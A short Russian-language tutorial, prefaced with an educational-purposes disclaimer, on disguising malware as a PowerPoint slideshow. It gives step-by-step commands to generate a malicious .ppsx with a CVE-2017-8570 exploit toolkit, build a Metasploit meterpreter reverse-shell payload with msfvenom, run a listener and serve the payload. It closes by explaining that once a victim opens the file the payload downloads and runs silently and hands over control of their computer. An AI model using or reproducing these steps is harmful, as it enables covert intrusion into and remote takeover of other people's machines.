Маскировка вируса под PowerPoint
Данный материал предоставлен лишь в образовательных целях и создан в рамках изучения информационной безопасности. Автор не публиковал материал для вредоносных целей. Если кто-либо воспользуется информацией для личной выгоды, то автор не несёт ответственность за любой причинённый вред или ущерб.
Что нам понадобится:
- Kali linux
- Metasploit
- Знание базовых команд линукс
Начинаем:
1) Скачиваем эксплойт с GitHub->https://github.com/tezukanice/Office8570
2) Переходим в папку эксплойта:
cd Office8570
3) Создаём папку "template" (Понадобится для успешной генерации ppsx файла)
mkdir template
4)Переносим файл template.ppsx(он находится в папке, которую мы скачали)
cp template.ppsx template/
5)Создаём сам сaм .ppsx файл( имя презентации меняется здесь )
python cve-2017-8570_toolkit.py -M gen -w Invoke.ppsx -u http://ВашАйпи/logo.doc
Файл презентации мы сделали, нo в него нужно вшить вирус(полезную нагрузку)
7)Создадим Payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=ВашАйпи LPORT=4444 -f exe > /tmp/shell.exe
8) Запускаем слушатель, который сообщит и получит управление после открытия файла жертвой.
msfconsole -x «use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST ВашАйпи; set LPORT 4444; run»
9)Запускаем сервер
python cve-2017-8570_toolkit.py -M exp -e http://ВашАйпи/shell.exe -l /tmp/shell.exe
Принцип работы
После открытия презентации жертвой вирус начинает незаметно скачиваться, а затем компьютер автоматически запускает его. После этого в консоли откроется сессия и вы сможете управлять компьютером жертвы.